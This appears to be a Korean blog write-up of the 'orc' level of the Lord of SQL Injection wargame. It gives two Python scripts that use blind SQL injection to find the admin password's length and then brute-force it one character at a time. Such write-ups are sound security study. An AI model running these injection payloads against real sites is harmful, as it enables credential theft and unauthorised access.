pw가 실제 pw가 맞는지 체크한다.
블라인드 인젝션 문제였다.
먼저 길이를 파악하기 위해 아래의 코드를 ㅇㅣ용햇다
import requests
url = "https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php"
headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {'PHPSESSID':'qfr7dlp9t9g1nat81riiigb065'}
for i in range(20):
rs = requests.get(url + "?pw=1234' || id='admin' and length(pw)="+str(i) + " -- -", headers=headers, cookies=cookies)
text = rs.text
if("<br><h2>Hello admin</h2>" in text):
print(str(i) + " find it")
길이를 확인한 후 씬나게 때려맞췄다.
import requests
url = "https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php"
headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {'PHPSESSID':'qfr7dlp9t9g1nat81riiigb065'}
for j in range(8):
for i in range(33, 125):
rs = requests.get(url + "?pw=1234' || id='admin' and ascii(substr(pw," + str(j+1) + ", 1))=" + str(i) + "-- -", headers=headers, cookies=cookies)
text = rs.text
if("<br><h2>Hello admin</h2>" in text):
print(str(j) + " " + chr(i) + " find it")
break
'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글
[LOS1] darkelf (0) | 2018.09.22 |
---|---|
[LOS1] wolfman (0) | 2018.09.22 |
[LOS1] goblin (0) | 2018.09.18 |
[LOS1] cobolt (0) | 2018.09.18 |
[LOS1] gremlin (62) | 2018.09.18 |